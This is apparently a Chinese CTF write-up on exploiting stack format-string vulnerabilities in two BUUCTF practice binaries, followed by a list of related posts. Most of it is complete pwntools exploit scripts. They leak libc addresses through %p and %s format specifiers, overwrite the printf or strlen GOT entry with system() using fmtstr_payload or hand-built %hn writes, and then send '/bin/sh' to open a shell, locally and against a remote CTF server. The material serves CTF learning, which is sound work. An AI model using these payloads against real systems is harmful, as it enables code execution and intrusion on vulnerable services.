2. 程式人生 > 其它 >星盟 | 棧上格式化字串漏洞利用

星盟 | 棧上格式化字串漏洞利用

阿新 發佈:2021-10-03

wdb_2018_2nd_easyfmt | buuctf

檢視保護可以知道GOT表可寫,只開了NX保護,主體函式是迴圈函式,那麼可以通過洩露地址,將printf(&buf);覆寫為system("/bin/sh");

但是程式中本身沒有呼叫system,所以要在libc中找system,所以第一步是洩露地址,模擬輸入,洩露棧資料(與libc有關的)

printf與system的地址有2.5位元組不同

# 本地
from pwn import *
context.log_level = "debug"
#context.terminal = ['tmux','splitw','-h']
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
#p = remote("node4.buuoj.cn",26170)
p = process("wdb_2018_2nd_easyfmt")

elf = ELF('./wdb_2018_2nd_easyfmt')

 
libc = ELF("./lib32.so")

printf_got = elf.got['printf']

success("printf_got => {} ".format(hex(printf_got)))
def myp32(input):
    return p32(input).decode("iso-8859-1")


#gdb.attach(p,"b*printf")

p.recvuntil("Do you know repeater?\n")
p.sendline("%3$p")
libc_base = int(p.recv(10),16) -  0x9079b 
system_addr = libc_base + 0x3adb0



success("libc_base => {} ".format(hex(libc_base)))
success("system_addr => {} ".format(hex(system_addr)))


'''
system_low = system_addr&0xffffS
system_high = (system_addr>>16)&0xffff
payload = myp32(printf_got) +myp32(printf_got+2)  
payload += "%"+str(system_low-8)+'c%6$hn'
payload += "%"+str(system_high-system_low)+'c%7$hn'
'''
payload = fmtstr_payload(6,{printf_got:system_addr},write_size = 'short')
p.send(payload)
#pause()
#sleep(0.2)
pause()
p.send('/bin/sh\x00')
#p.recvall()
pause()
p.interactive()

axb_2019_fmt32 | buuctf

跟上題的保護機制一樣,IDA原始碼如下,對於迴圈有輸入的時間限制,可以選擇洩露libc基地址

在printf處下斷點,可以看到輸入相對於格式化字串的偏移為8,並且還沒對齊,對其需要一個字元。

#本地

from pwn import *

context(os='linux',arch='i386',log_level='debug')
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']

r = process("./axb_2019_fmt32")
#r = remote("node4.buuoj.cn","27205")
elf=ELF("./axb_2019_fmt32")
libc = ELF("./libc-2.23 .so")
printf_got = elf.got['printf']

def myp32(input):
    return p32(input).decode("iso-8859-1")

#gdb.attach(r,"b *printf")

payload = 'a' + myp32(printf_got) +'22'+ '%8$s'
r.sendafter('me:', payload)
r.recvuntil("22")
printf_addr = u32(r.recv(4))
print ("printf_addr:"+hex(printf_addr))

#libc=LibcSearcher('printf',printf_addr)

#libc_base=printf_addr-libc.dump('printf')
#system=libc_base+libc.dump('system')

libc_base=printf_addr-0x49680
system=libc_base+ 0x3adb0

success("libc_base => {} ".format(hex(libc_base)))
success("system_addr => {} ".format(hex(system)))


payload=b'a'+fmtstr_payload(8,{printf_got:system},write_size = "short",numbwritten = 0xa)
#p.recvuntil(':')
r.sendline(payload)
gdb.attach(r,"b *printf")
#pause()
r.sendline(';/bin/sh\x00')

r.interactive()

參考


#coding:utf-8
from pwn import *

context(os='linux',arch='i386',log_level='debug')

#sh = process("./axb_2019_fmt32")
sh = remote("node4.buuoj.cn","27205")

please_tell_me = 0x804887D
printf_got = 0x804A014
strlen_got = 0x804A024

def myp32(input):
    return p32(input).decode("iso-8859-1")

x = 'A' + myp32(printf_got)+ '22' + '%8$s'
sh.sendafter("Please tell me:",x)

sh.recvuntil("22")
printf_addr = u32(sh.recv(4))
print(hex(printf_addr))

system_addr = printf_addr - 0xe6e0
binsh = printf_addr + 0x11000b


high_sys = (system_addr >> 16) & 0xffff
low_sys = system_addr & 0xffff
print('sys'+hex(system_addr))
print('low'+hex(low_sys))
print('high'+hex(high_sys))

x = 'A' + myp32(strlen_got) + myp32(strlen_got+2) + '%' + str(low_sys-18) +'c%8$hn' + '%' + str(high_sys - low_sys) + 'c%9$hn'
#x = 'A' + p32(strlen_got) + '%' + str(system_addr-14) + 'c%8$n' 
# 用%n寫入不行,程式超時而且並沒有寫入,之後還是正常執行
sh.sendafter("Please tell me:",x) 


x = ';/bin/sh\x00'
sh.sendafter("Please tell me:",x)

sh.interactive()

 
遠端
from os import system
from pwn import *
from LibcSearcher import *

context(os='linux',arch='i386',log_level='debug')
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']

#r = process("./axb_2019_fmt32")
r = remote("node4.buuoj.cn","27205")
elf=ELF("./axb_2019_fmt32")
#libc = ELF("./libc-2.23 .so")
printf_got = elf.got['printf']
strlen_got = 0x804A024
def myp32(input):
    return p32(input).decode("iso-8859-1")

#gdb.attach(r,"b *printf")

payload = 'a' + myp32(printf_got) +'22'+ '%8$s'
r.sendafter('me:', payload)
r.recvuntil("22")
printf_addr = u32(r.recv(4))
print ("printf_addr:"+hex(printf_addr))

#libc=LibcSearcher('printf',printf_addr)

#libc_base=printf_addr-libc.dump('printf')
#system=libc_base+libc.dump('system')

system = printf_addr- 0xe6e0

success("system_addr => {} ".format(hex(system)))


payload=b'a'+fmtstr_payload(8,{strlen_got:system},write_size = "short",numbwritten = 0xa)
#p.recvuntil(':')
r.sendline(payload)
#gdb.attach(r,"b *printf")
#pause()
r.sendline(';/bin/sh\x00')

r.interactive()

不太明白的是為什麼要替換strlen和地址偏移(本地除錯不出來這個偏移)

zer0_1s

相關推薦

| 格式化字串漏洞利用

wdb_2018_2nd_easyfmt | buuctf 檢視保護可以知道GOT表可寫,只開了NX保護,主體函式是迴圈函式,那麼可以通過洩露地址,將printf(&buf);覆寫為system(\"/bin/sh\");

PWN學習之格式化字串漏洞

目錄PWN學習之格式化字串漏洞格式化輸出函式格式化字串漏洞漏洞利用使程式崩潰資料洩露任意地址記憶體洩漏資料覆蓋任意地址記憶體覆蓋

格式化字串漏洞

格式化字串漏洞 常用的可利用函式 #include <stdio.h> int printf(const char *format, ...);

49:WAF繞過-漏洞利用之注入傳跨站等繞過

思維導圖 1、SQL注入 如需sqlmap注入測試, 防cc攔截:修改user-agent頭+代理(付費代理池)

如何在外建造人類家園:“就地資源利用”刺激地球的創新

北京時間 3 月 6 日訊息,據國外媒體報道,人類即將重返月球,而這一次,我們可能會建立長期的月球基地。然而,在長期的太空任務中,宇航員們的生活和工作都需要必要的基礎設施,他們還需要展開實地探索活動,與地球

CVE-2016-10277在MOTO X手機漏洞利用實踐

CVE-2016-10277是存在於摩托羅拉系列手機的bootloader高危漏洞,可以通過核心命令注入劫持手機的啟動流程,載入攻擊者控制的initramfs,從而達到root提權的目的。我們手上正好有一個摩托羅拉的MOTO X手機,於是參照[

python3格式化字串 f-string的高階用法(推薦)

f-string,亦稱為格式化字串常量(formatted string literals),是Python3.6新引入的一種字串格式化方法,該方法源於PEP 498 – Literal String Interpolation,主要目的是使格式化字串的操作更加簡便。

Python中格式化字串的四種實現

關於Python的格式化字串,幾乎所有接觸過Python語言的人都知道其中一種,即使用運算子%,但對於絕大多數初學者來說也僅此而已。

C# 為型別輸出格式化字串

有兩種方法可以為型別提供格式化字串輸出: 1、讓型別繼承IFormattable介面,實現IFormattable介面的ToString方法,需要開發者可以預見型別在格式化方面的要求。

zabbix服務漏洞利用入侵伺服器

zabbix服務開放埠為10051,瀏覽器訪問http://IP/zabbix進行配置即可訪問zabbix的前臺頁面。

SSRF漏洞利用之Redis大神賜予shell

0x00實驗環境 1、centos靶機(IP為:192.168.11.205,橋接模式) 2、kali黑客攻擊主機(IP為:192.168.172.129,NAT模式)

006-3 格式化字串的4種方式

格式化字串的4種方式 目錄: Python格式化字串的4中方式 一:%號 二:str.format 三:f-Strings

PHP vsprintf()函式格式化字串操作原理解析

例項 把格式化字串寫入變數中: <?php $number = 9; $str = \"Beijing\"; $txt = vsprintf(\"There are %u million bicycles in %s.\",array($number,$str));

Zabbix漏洞利用 CVE-2016-10134

最近也是遇見了Zabbix,所以這裡以CVE-2016-10134為例復現一下該漏洞 什麼是Zabbix?

js實現數字轉換為逗號分隔的格式化字串

//注意:數字與字元的轉換會丟失多餘的尾部0(\'123.010\'<->123.01,\'123.00\'<->123)

命令執行漏洞利用及繞過方式總結

命令注入常見的方法 1.常見管道符   Windows系統支援的管道符   Linux系統支援的管道符

Unity String格式化字串

1 1、格式化貨幣(跟系統的環境有關,中文系統預設格式化人民幣,英文系統格式化美元)

C# Format格式化字串的基本操作

1static void Main(string[] args) 2{ 3//格式化字串Format 4String a = \"我是傻逼\"; 5String b = \"WSSB\";

逃逸分析-分配

使用逃逸分析-進行程式碼優化   使用逃逸分析,編譯器可以對程式碼做如下優化:  一、棧上分配。將堆分配轉化為分配。如果一個物件在子程式中被分配,要使指向該物件的指標永遠不會逃逸,物件可能是分配的候選

JavaScript的padStart()和padEnd()格式化字串使用技巧

幾天前,我正在使用JavaScript構建倒數計時器,因此我需要格式化秒和毫秒,我希望秒始終是2位數的長度,而毫秒總是3位數的長度,換句話說,我希望1秒顯示為01,1毫秒顯示為001。